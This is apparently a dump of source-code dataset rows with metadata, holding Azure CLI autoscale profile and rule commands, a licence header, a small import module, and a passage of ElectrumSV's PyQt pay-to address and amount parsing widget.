_apply_copy_rules(autoscale_settings, profile, copy_rules)
autoscale_settings.profiles.append(profile)
# pylint: disable=unused-argument
def _create_recurring_profile(autoscale_settings, profile_name, start, end, recurrence, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import (
AutoscaleProfile, Recurrence, RecurrentSchedule)
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile, validate_autoscale_profile
import dateutil
from datetime import time
import json
def _build_recurrence(base, time):
recurrence = Recurrence(
frequency=base.frequency,
schedule=RecurrentSchedule(
time_zone=base.schedule.time_zone,
days=base.schedule.days,
hours=[time.hour],
minutes=[time.minute]
)
)
return recurrence
start_time = dateutil.parser.parse(start).time() if start else time(hour=0, minute=0)
end_time = dateutil.parser.parse(end).time() if end else time(hour=23, minute=59)
default_profile, autoscale_profile = build_autoscale_profile(autoscale_settings)
validate_autoscale_profile(autoscale_profile, start_time, end_time, recurrence)
start_profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
recurrence=_build_recurrence(recurrence, start_time)
)
_apply_copy_rules(autoscale_settings, start_profile, copy_rules)
end_profile = AutoscaleProfile(
name=json.dumps({'name': default_profile.name, 'for': profile_name}),
capacity=default_profile.capacity,
rules=default_profile.rules,
recurrence=_build_recurrence(recurrence, end_time)
)
autoscale_settings.profiles.append(start_profile)
autoscale_settings.profiles.append(end_profile)
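# Note on the naming convention used above: a recurring schedule is stored as a pair of
# profiles - the requested one plus an auto-generated "end" profile whose name is a JSON
# string such as '{"name": "default", "for": "weekend"}'. autoscale_update() relies on the
# same convention when it json.loads() a profile name to detect the recurring defaults.
# (The "weekend" profile name here is only a hypothetical example.)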
def autoscale_profile_create(client, autoscale_name, resource_group_name, profile_name,
count, timezone, start=None, end=None, copy_rules=None, min_count=None,
max_count=None, recurrence=None):
from azure.mgmt.monitor.models import ScaleCapacity
autoscale_settings = client.get(resource_group_name, autoscale_name)
capacity = ScaleCapacity(
default=count,
minimum=min_count or count,
maximum=max_count or count
)
if recurrence:
_create_recurring_profile(
autoscale_settings, profile_name, start, end, recurrence, capacity, copy_rules, timezone)
else:
_create_fixed_profile(
autoscale_settings, profile_name, start, end, capacity, copy_rules, timezone)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_list(cmd, client, autoscale_name, resource_group_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
return autoscale_settings.profiles
def autoscale_profile_list_timezones(cmd, client, offset=None, search_query=None):
from azure.cli.command_modules.monitor._autoscale_util import AUTOSCALE_TIMEZONES
timezones = []
for zone in AUTOSCALE_TIMEZONES:
if search_query and search_query.lower() not in zone['name'].lower():
continue
if offset and offset not in zone['offset']:
continue
timezones.append(zone)
return timezones
def autoscale_profile_show(cmd, client, autoscale_name, resource_group_name, profile_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_delete(cmd, client, autoscale_name, resource_group_name, profile_name):
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
import json
autoscale_settings = client.get(resource_group_name, autoscale_name)
default_profile, _ = build_autoscale_profile(autoscale_settings)
def _should_retain_profile(profile):
name = profile.name
try:
name = json.loads(profile.name)['for']
except ValueError:
pass
return name.lower() != profile_name.lower()
autoscale_settings.profiles = [x for x in autoscale_settings.profiles if _should_retain_profile(x)]
# if we removed the last "default" of a recurring pair, we need to preserve it
new_default, _ = build_autoscale_profile(autoscale_settings)
if not new_default:
autoscale_settings.profiles.append(default_profile)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_create(cmd, client, autoscale_name, resource_group_name, condition,
scale, profile_name=DEFAULT_PROFILE_NAME, cooldown=5, source=None,
timegrain="avg 1m"):
from azure.mgmt.monitor.models import ScaleRule, ScaleAction, ScaleDirection
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
condition.metric_resource_uri = source or autoscale_settings.target_resource_uri
condition.statistic = timegrain.statistic
condition.time_grain = timegrain.time_grain
rule = ScaleRule(
metric_trigger=condition,
scale_action=ScaleAction(
direction=scale.direction,
type=scale.type,
cooldown='PT{}M'.format(cooldown),
value=scale.value)
)
profile.rules.append(rule)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
# determine if there are unbalanced rules
scale_out_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.increase])
scale_in_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.decrease])
if scale_out_rule_count and not scale_in_rule_count:
logger.warning("Profile '%s' has rules to scale out but none to scale in. "
"Recommend creating at least 1 scale in rule.", profile_name)
elif scale_in_rule_count and not scale_out_rule_count:
logger.warning("Profile '%s' has rules to scale in but none to scale out. "
"Recommend creating at least 1 scale out rule.", profile_name)
return rule
def autoscale_rule_list(cmd, client, autoscale_name, resource_group_name, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile_names = [x.name for x in autoscale_settings.profiles]
if profile_name not in profile_names:
from knack.util import CLIError
raise CLIError('Profile name is invalid. Please check the existence of the profile.')
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
index = 0
# we artificially add indices to the rules so the user can target them with the remove command
for rule in profile.rules:
setattr(rule, 'index', index)
index += 1
return profile.rules
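# The indices attached above line up with the `index` argument of autoscale_rule_delete /
# autoscale_rule_copy below, e.g. (hypothetical CLI usage, assuming the rules exist):
#
#   az monitor autoscale rule list   --autoscale-name my-as -g my-rg
#   az monitor autoscale rule delete --autoscale-name my-as -g my-rg --index 0 2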
def autoscale_rule_delete(cmd, client, autoscale_name, resource_group_name, index, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
# delete the indices provided
if '*' in index:
profile.rules = []
else:
for i in index:
del profile.rules[int(i)]
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_copy(cmd, client, autoscale_name, resource_group_name, dest_profile, index,
source_profile=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
src_profile = next(x for x in autoscale_settings.profiles if x.name == source_profile)
dst_profile = next(x for x in autoscale_settings.profiles if x.name == dest_profile)
if '*' in index:
dst_profile.rules = src_profile.rules
else:
for i in index:
dst_profile.rules.append(src_profile.rules[int(i)])
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
| 43.334218
| 118
| 0.700863
|
from knack.log import get_logger
logger = get_logger(__name__)
DEFAULT_PROFILE_NAME = 'default'
def scaffold_autoscale_settings_parameters(client):
import os.path
from knack.util import CLIError
from azure.cli.core.util import get_file_json
curr_dir = os.path.dirname(os.path.realpath(__file__))
autoscale_settings_parameter_file_path = os.path.join(
curr_dir, 'autoscale-parameters-template.json')
if not os.path.exists(autoscale_settings_parameter_file_path):
raise CLIError('File {} not found.'.format(autoscale_settings_parameter_file_path))
return get_file_json(autoscale_settings_parameter_file_path)
def autoscale_create(client, resource, count, autoscale_name=None, resource_group_name=None,
min_count=None, max_count=None, location=None, tags=None, disabled=None,
actions=None, email_administrator=None, email_coadministrators=None):
from azure.mgmt.monitor.models import (
AutoscaleSettingResource, AutoscaleProfile, AutoscaleNotification, ScaleCapacity,
EmailNotification, WebhookNotification)
if not autoscale_name:
from msrestazure.tools import parse_resource_id
autoscale_name = parse_resource_id(resource)['name']
min_count = min_count or count
max_count = max_count or count
default_profile = AutoscaleProfile(
name=DEFAULT_PROFILE_NAME,
capacity=ScaleCapacity(default=count, minimum=min_count, maximum=max_count),
rules=[]
)
notification = AutoscaleNotification(
email=EmailNotification(
custom_emails=[],
send_to_subscription_administrator=email_administrator,
send_to_subscription_co_administrators=email_coadministrators
),
webhooks=[]
)
for action in actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
autoscale = AutoscaleSettingResource(
location=location,
profiles=[default_profile],
tags=tags,
notifications=[notification],
enabled=not disabled,
autoscale_setting_resource_name=autoscale_name,
target_resource_uri=resource
)
if not (min_count == count and max_count == count):
logger.warning('Follow up with `az monitor autoscale rule create` to add scaling rules.')
return client.create_or_update(resource_group_name, autoscale_name, autoscale)
def autoscale_update(instance, count=None, min_count=None, max_count=None, tags=None, enabled=None,
add_actions=None, remove_actions=None, email_administrator=None,
email_coadministrators=None):
import json
from azure.mgmt.monitor.models import EmailNotification, WebhookNotification
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
if tags is not None:
instance.tags = tags
if enabled is not None:
instance.enabled = enabled
if any([count, min_count, max_count]):
default_profile, _ = build_autoscale_profile(instance)
curr_count = default_profile.capacity.default
curr_min = default_profile.capacity.minimum
curr_max = default_profile.capacity.maximum
is_fixed_count = curr_count == curr_min and curr_count == curr_max
if count is not None and is_fixed_count and min_count is None and max_count is None:
min_count = count
max_count = count
count = curr_count if count is None else count
min_count = curr_min if min_count is None else min_count
max_count = curr_max if max_count is None else max_count
for profile in instance.profiles:
if profile.fixed_date:
continue
if profile.recurrence:
try:
json.loads(profile.name)
except ValueError:
continue
profile.capacity.default = count
profile.capacity.minimum = min_count
profile.capacity.maximum = max_count
if not instance.notifications:
return instance
notification = next(x for x in instance.notifications if x.operation.lower() == 'scale')
if remove_actions is not None:
removed_emails, removed_webhooks = _parse_action_removals(remove_actions)
notification.email.custom_emails = \
[x for x in notification.email.custom_emails if x not in removed_emails]
notification.webhooks = \
[x for x in notification.webhooks if x.service_uri not in removed_webhooks]
for action in add_actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
if email_administrator is not None:
notification.email.send_to_subscription_administrator = email_administrator
if email_coadministrators is not None:
notification.email.send_to_subscription_co_administrators = email_coadministrators
return instance
def _parse_action_removals(actions):
flattened = list({x for sublist in actions for x in sublist})
emails = []
webhooks = []
for item in flattened:
if item.startswith('http://') or item.startswith('https://'):
webhooks.append(item)
else:
emails.append(item)
return emails, webhooks
def _apply_copy_rules(autoscale_settings, new_profile, copy_rules):
if copy_rules:
copy_profile = next(x for x in autoscale_settings.profiles if x.name == copy_rules)
if copy_profile:
new_profile.rules = copy_profile.rules[:]
def _create_fixed_profile(autoscale_settings, profile_name, start, end, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import AutoscaleProfile, TimeWindow
if not (start and end):
from knack.util import CLIError
raise CLIError('usage error: fixed schedule: --start DATETIME --end DATETIME')
profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
fixed_date=TimeWindow(start=start, end=end, time_zone=timezone),
)
_apply_copy_rules(autoscale_settings, profile, copy_rules)
autoscale_settings.profiles.append(profile)
def _create_recurring_profile(autoscale_settings, profile_name, start, end, recurrence, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import (
AutoscaleProfile, Recurrence, RecurrentSchedule)
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile, validate_autoscale_profile
import dateutil
from datetime import time
import json
def _build_recurrence(base, time):
recurrence = Recurrence(
frequency=base.frequency,
schedule=RecurrentSchedule(
time_zone=base.schedule.time_zone,
days=base.schedule.days,
hours=[time.hour],
minutes=[time.minute]
)
)
return recurrence
start_time = dateutil.parser.parse(start).time() if start else time(hour=0, minute=0)
end_time = dateutil.parser.parse(end).time() if end else time(hour=23, minute=59)
default_profile, autoscale_profile = build_autoscale_profile(autoscale_settings)
validate_autoscale_profile(autoscale_profile, start_time, end_time, recurrence)
start_profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
recurrence=_build_recurrence(recurrence, start_time)
)
_apply_copy_rules(autoscale_settings, start_profile, copy_rules)
end_profile = AutoscaleProfile(
name=json.dumps({'name': default_profile.name, 'for': profile_name}),
capacity=default_profile.capacity,
rules=default_profile.rules,
recurrence=_build_recurrence(recurrence, end_time)
)
autoscale_settings.profiles.append(start_profile)
autoscale_settings.profiles.append(end_profile)
def autoscale_profile_create(client, autoscale_name, resource_group_name, profile_name,
count, timezone, start=None, end=None, copy_rules=None, min_count=None,
max_count=None, recurrence=None):
from azure.mgmt.monitor.models import ScaleCapacity
autoscale_settings = client.get(resource_group_name, autoscale_name)
capacity = ScaleCapacity(
default=count,
minimum=min_count or count,
maximum=max_count or count
)
if recurrence:
_create_recurring_profile(
autoscale_settings, profile_name, start, end, recurrence, capacity, copy_rules, timezone)
else:
_create_fixed_profile(
autoscale_settings, profile_name, start, end, capacity, copy_rules, timezone)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_list(cmd, client, autoscale_name, resource_group_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
return autoscale_settings.profiles
def autoscale_profile_list_timezones(cmd, client, offset=None, search_query=None):
from azure.cli.command_modules.monitor._autoscale_util import AUTOSCALE_TIMEZONES
timezones = []
for zone in AUTOSCALE_TIMEZONES:
if search_query and search_query.lower() not in zone['name'].lower():
continue
if offset and offset not in zone['offset']:
continue
timezones.append(zone)
return timezones
def autoscale_profile_show(cmd, client, autoscale_name, resource_group_name, profile_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_delete(cmd, client, autoscale_name, resource_group_name, profile_name):
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
import json
autoscale_settings = client.get(resource_group_name, autoscale_name)
default_profile, _ = build_autoscale_profile(autoscale_settings)
def _should_retain_profile(profile):
name = profile.name
try:
name = json.loads(profile.name)['for']
except ValueError:
pass
return name.lower() != profile_name.lower()
autoscale_settings.profiles = [x for x in autoscale_settings.profiles if _should_retain_profile(x)]
new_default, _ = build_autoscale_profile(autoscale_settings)
if not new_default:
autoscale_settings.profiles.append(default_profile)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_create(cmd, client, autoscale_name, resource_group_name, condition,
scale, profile_name=DEFAULT_PROFILE_NAME, cooldown=5, source=None,
timegrain="avg 1m"):
from azure.mgmt.monitor.models import ScaleRule, ScaleAction, ScaleDirection
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
condition.metric_resource_uri = source or autoscale_settings.target_resource_uri
condition.statistic = timegrain.statistic
condition.time_grain = timegrain.time_grain
rule = ScaleRule(
metric_trigger=condition,
scale_action=ScaleAction(
direction=scale.direction,
type=scale.type,
cooldown='PT{}M'.format(cooldown),
value=scale.value)
)
profile.rules.append(rule)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
scale_out_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.increase])
scale_in_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.decrease])
if scale_out_rule_count and not scale_in_rule_count:
logger.warning("Profile '%s' has rules to scale out but none to scale in. "
"Recommend creating at least 1 scale in rule.", profile_name)
elif scale_in_rule_count and not scale_out_rule_count:
logger.warning("Profile '%s' has rules to scale in but none to scale out. "
"Recommend creating at least 1 scale out rule.", profile_name)
return rule
def autoscale_rule_list(cmd, client, autoscale_name, resource_group_name, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile_names = [x.name for x in autoscale_settings.profiles]
if profile_name not in profile_names:
from knack.util import CLIError
raise CLIError('Profile name is invalid. Please check the existence of the profile.')
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
index = 0
for rule in profile.rules:
setattr(rule, 'index', index)
index += 1
return profile.rules
def autoscale_rule_delete(cmd, client, autoscale_name, resource_group_name, index, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
if '*' in index:
profile.rules = []
else:
for i in index:
del profile.rules[int(i)]
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_copy(cmd, client, autoscale_name, resource_group_name, dest_profile, index,
source_profile=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
src_profile = next(x for x in autoscale_settings.profiles if x.name == source_profile)
dst_profile = next(x for x in autoscale_settings.profiles if x.name == dest_profile)
if '*' in index:
dst_profile.rules = src_profile.rules
else:
for i in index:
dst_profile.rules.append(src_profile.rules[int(i)])
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
| true
| true
|
1c3ea55a9729d4899c05e8ba4f39867721eb3eb4
| 1,468
|
py
|
Python
|
Src/Nets/KeyPoint/__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 12
|
2019-08-20T06:27:15.000Z
|
2022-02-15T05:26:58.000Z
|
Src/Nets/KeyPoint/__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | null | null | null |
Src/Nets/KeyPoint/__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 7
|
2019-08-26T03:31:26.000Z
|
2022-03-19T06:17:39.000Z
|
# Copyright 2020 winshare
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************** #
# #
# ::: :::::::: #
# __init__.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: winshare <tanwenxuan@live.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/03/11 19:48:45 by winshare #+# #+# #
# Updated: 2020/03/11 19:48:45 by winshare ### ########.fr #
# #
# **************************************************************************** #
| 54.37037
| 80
| 0.366485
| true
| true
|
|
1c3ea56d42d3313abd71a2446b8e9d75e9fcc94c
| 96
|
py
|
Python
|
cruw/eval/__init__.py
|
kanishkaisreal/cruw-devkit
|
81e2da7de79b112d78c786d7d4be2504704368c7
|
[
"MIT"
] | 29
|
2020-12-15T07:17:53.000Z
|
2022-03-28T03:04:21.000Z
|
cruw/eval/__init__.py
|
kanishkaisreal/cruw-devkit
|
81e2da7de79b112d78c786d7d4be2504704368c7
|
[
"MIT"
] | 12
|
2021-01-07T02:31:50.000Z
|
2022-03-29T02:19:37.000Z
|
cruw/eval/__init__.py
|
kanishkaisreal/cruw-devkit
|
81e2da7de79b112d78c786d7d4be2504704368c7
|
[
"MIT"
] | 11
|
2021-01-13T03:39:57.000Z
|
2022-03-04T04:57:34.000Z
|
from .rod.eval_rod2021 import evaluate_rod2021
from .rod.eval_rodnet import evaluate_rodnet_seq
| 32
| 48
| 0.875
|
from .rod.eval_rod2021 import evaluate_rod2021
from .rod.eval_rodnet import evaluate_rodnet_seq
| true
| true
|
1c3ea5bd4e61f72df060889b3ddac34e67626514
| 10,647
|
py
|
Python
|
electrumsv/gui/qt/paytoedit.py
|
bitcartel/electrumsv
|
009ea3675292a26a5a197fc8602dafca5453f9c5
|
[
"MIT"
] | 1
|
2021-12-28T10:52:11.000Z
|
2021-12-28T10:52:11.000Z
|
electrumsv/gui/qt/paytoedit.py
|
bitcartel/electrumsv
|
009ea3675292a26a5a197fc8602dafca5453f9c5
|
[
"MIT"
] | null | null | null |
electrumsv/gui/qt/paytoedit.py
|
bitcartel/electrumsv
|
009ea3675292a26a5a197fc8602dafca5453f9c5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
from decimal import Decimal
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontMetrics, QTextCursor
from PyQt5.QtWidgets import QCompleter, QPlainTextEdit
from bitcoinx import cashaddr, Script, Address, TxOutput
from .qrtextedit import ScanQRTextEdit
from electrumsv.i18n import _
from electrumsv.web import is_URI
from . import util
RE_ALIAS = r'^(.*?)\s*\<([0-9A-Za-z:]{26,})\>$'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
''' timestamp indicating when the user was last warned about using cash addresses. '''
last_cashaddr_warning = None
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self._on_text_changed)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def set_validated(self):
self.setStyleSheet(util.ColorScheme.GREEN.as_stylesheet(True))
def set_expired(self):
self.setStyleSheet(util.ColorScheme.RED.as_stylesheet(True))
def _show_cashaddr_warning(self, address_text):
'''
        Cash addresses have no future on BSV. Anyone who uses one should be warned that
        they are being phased out, in order to encourage a pre-emptive move to standard addresses.
'''
address_text = self._parse_address_text(address_text)
# We only care if it is decoded, as this will be a cash address.
try:
cashaddr.decode(address_text)
except:
return
last_check_time = PayToEdit.last_cashaddr_warning
ignore_watermark_time = time.time() - 24 * 60 * 60
if last_check_time is None or last_check_time < ignore_watermark_time:
PayToEdit.last_cashaddr_warning = time.time()
message = ("<p>"+
_("One or more of the addresses you have provided has been recognized "+
"as a 'cash address'. For now, this is acceptable but is recommended that you get "+
"in the habit of requesting that anyone who provides you with payment addresses "+
"do so in the form of normal Bitcoin SV addresses.")+
"</p>"+
"<p>"+
_("Within the very near future, various services and applications in the Bitcoin "+
"SV ecosystem will stop accepting 'cash addresses'. It is in your best interest "+
"to make sure you transition over to normal Bitcoin SV addresses as soon as "+
"possible, in order to ensure that you can both be paid, and also get paid.")+
"</p>"
)
util.MessageBox.show_warning(message, title=_("Cash address warning"))
def _parse_tx_output(self, line):
x, y = line.split(',')
script = self._parse_output(x)
if not isinstance(script, Script): # An Address object
script = script.to_script()
amount = self._parse_amount(y)
return TxOutput(amount, script)
def _parse_output(self, x):
try:
address = self._parse_address(x)
self._show_cashaddr_warning(x)
return address
except:
return Script.from_asm(x)
def _parse_address_text(self, line):
'''
This checks to see if the address is in the form of a contact, with name and address,
and if so, extracts the address. Otherwise the line is assumed to be the address.
'''
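        # Illustrative example (added; the sample value is hypothetical, not from the
        # source): a contact-style line such as
        #   "Alice <qrk5uqhphvcpgmgtzyf9kcqdp8uqm29sjvtyy4n4wm7>"
        # matches RE_ALIAS, so group(2) yields only the address between the angle
        # brackets; a bare address line fails the match and is simply returned stripped.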
r = line.strip()
m = re.match(RE_ALIAS, r)
return m.group(2) if m else r
def _parse_address(self, line):
address = self._parse_address_text(line)
return Address.from_string(address)
def _parse_amount(self, x):
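        # (Added note: '!' means "spend the maximum available amount"; otherwise the
        # textual amount is scaled by 10**decimal_point() to convert from the display
        # unit of the amount field into the wallet's base unit.)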
if x.strip() == '!':
return all
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def _on_text_changed(self):
self.errors = []
if self.is_pr:
return
# filter out empty lines
lines = [i for i in self._lines() if i]
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if is_URI(data):
self.scan_f(data)
return
try:
self.payto_address = self._parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
tx_output = self._parse_tx_output(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append(tx_output)
if tx_output.value is all:
is_max = True
else:
total += tx_output.value
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = all
else:
amount = self.amount_edit.get_amount()
addr = self.payto_address
self.outputs = [TxOutput(amount, addr.to_script())]
return self.outputs[:]
def _lines(self):
return self.toPlainText().split('\n')
def _is_multiline(self):
return len(self._lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
lineHeight = QFontMetrics(self.document().defaultFont()).height()
docHeight = self.document().size().height()
h = docHeight * lineHeight + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def set_completer(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self._insert_completion)
def _insert_completion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = len(completion) - len(self.c.completionPrefix())
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion[-extra:])
self.setTextCursor(tc)
def _get_text_under_cursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self._is_multiline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
        ctrlOrShift = e.modifiers() & (Qt.ControlModifier | Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and not e.text()):
return
eow = "~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-="
hasModifier = (e.modifiers() != Qt.NoModifier) and not ctrlOrShift
completionPrefix = self._get_text_under_cursor()
if hasModifier or not e.text() or len(completionPrefix) < 1 or eow.find(e.text()[-1]) >= 0:
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix)
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0)
+ self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data and data.startswith("bitcoincash:"):
self.scan_f(data)
# TODO: update fee
def resolve(self):
self.is_alias = False
if self.hasFocus():
return
if self._is_multiline(): # only supports single line entries atm
return
if self.is_pr:
return
key = str(self.toPlainText())
if key == self.previous_payto:
return
self.previous_payto = key
| 34.234727
| 100
| 0.609749
|
import re
import time
from decimal import Decimal
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontMetrics, QTextCursor
from PyQt5.QtWidgets import QCompleter, QPlainTextEdit
from bitcoinx import cashaddr, Script, Address, TxOutput
from .qrtextedit import ScanQRTextEdit
from electrumsv.i18n import _
from electrumsv.web import is_URI
from . import util
RE_ALIAS = r'^(.*?)\s*\<([0-9A-Za-z:]{26,})\>$'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
last_cashaddr_warning = None
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self._on_text_changed)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def set_validated(self):
self.setStyleSheet(util.ColorScheme.GREEN.as_stylesheet(True))
def set_expired(self):
self.setStyleSheet(util.ColorScheme.RED.as_stylesheet(True))
def _show_cashaddr_warning(self, address_text):
address_text = self._parse_address_text(address_text)
try:
cashaddr.decode(address_text)
except:
return
last_check_time = PayToEdit.last_cashaddr_warning
